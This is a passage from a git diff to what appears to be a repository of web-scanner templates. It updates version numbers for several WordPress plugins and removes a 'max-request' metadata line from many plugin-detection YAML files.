- .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 213 files changed, 13 insertions(+), 213 deletions(-) diff --git a/helpers/wordpress/plugins/facebook-for-woocommerce.txt b/helpers/wordpress/plugins/facebook-for-woocommerce.txt index 8d87cdedf4..1098afd3c5 100644 --- a/helpers/wordpress/plugins/facebook-for-woocommerce.txt +++ b/helpers/wordpress/plugins/facebook-for-woocommerce.txt @@ -1 +1 @@ -3.0.32 \ No newline at end of file +3.0.33 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt index d21aa93ccd..160fe391c8 100644 --- a/helpers/wordpress/plugins/google-listings-and-ads.txt +++ b/helpers/wordpress/plugins/google-listings-and-ads.txt @@ -1 +1 @@ -2.5.4 \ No newline at end of file +2.5.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/header-footer-code-manager.txt b/helpers/wordpress/plugins/header-footer-code-manager.txt index 98924abee9..474ad5be60 100644 --- a/helpers/wordpress/plugins/header-footer-code-manager.txt +++ b/helpers/wordpress/plugins/header-footer-code-manager.txt @@ -1 +1 @@ -1.1.35 \ No newline at end of file +1.1.36 \ No newline at end of file diff --git a/helpers/wordpress/plugins/host-webfonts-local.txt b/helpers/wordpress/plugins/host-webfonts-local.txt index 7ba0f8a70a..262122f679 100644 --- a/helpers/wordpress/plugins/host-webfonts-local.txt +++ b/helpers/wordpress/plugins/host-webfonts-local.txt @@ -1 +1 @@ -5.6.7 \ No newline at end of file +5.7.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index 4731277131..2700fff004 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.26.0 \ No newline at end of file +4.26.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mainwp-child.txt b/helpers/wordpress/plugins/mainwp-child.txt index 958d30d86d..99523d4768 100644 --- a/helpers/wordpress/plugins/mainwp-child.txt +++ b/helpers/wordpress/plugins/mainwp-child.txt @@ -1 +1 @@ -4.5 \ No newline at end of file +4.5.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pinterest-for-woocommerce.txt b/helpers/wordpress/plugins/pinterest-for-woocommerce.txt index 06c7347f09..2fe9589453 100644 --- a/helpers/wordpress/plugins/pinterest-for-woocommerce.txt +++ b/helpers/wordpress/plugins/pinterest-for-woocommerce.txt @@ -1 +1 @@ -1.3.8 \ No newline at end of file +1.3.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/really-simple-ssl.txt b/helpers/wordpress/plugins/really-simple-ssl.txt index 19300b7be4..28118975be 100644 --- a/helpers/wordpress/plugins/really-simple-ssl.txt +++ b/helpers/wordpress/plugins/really-simple-ssl.txt @@ -1 +1 @@ -7.0.8 \ No newline at end of file +7.0.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/the-events-calendar.txt b/helpers/wordpress/plugins/the-events-calendar.txt index 11aab86760..0df17dd0f6 100644 --- a/helpers/wordpress/plugins/the-events-calendar.txt +++ b/helpers/wordpress/plugins/the-events-calendar.txt @@ -1 +1 @@ -6.2.0.1 \ No newline at end of file +6.2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt index 62ae32d582..8122ad0173 100644 --- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt +++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt @@ -1 +1 @@ -2.7.7 \ No newline at end of file +2.7.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index c0be8a7992..f9da12e118 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -6.4.0 \ No newline at end of file +6.3.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-services.txt b/helpers/wordpress/plugins/woocommerce-services.txt index 45674f16a8..fd06a9268d 100644 --- a/helpers/wordpress/plugins/woocommerce-services.txt +++ b/helpers/wordpress/plugins/woocommerce-services.txt @@ -1 +1 @@ -2.3.3 \ No newline at end of file +2.3.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wordpress-seo.txt b/helpers/wordpress/plugins/wordpress-seo.txt index 74623ac8d7..90cd64c4fa 100644 --- a/helpers/wordpress/plugins/wordpress-seo.txt +++ b/helpers/wordpress/plugins/wordpress-seo.txt @@ -1 +1 @@ -21.0 \ No newline at end of file +21.1 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- 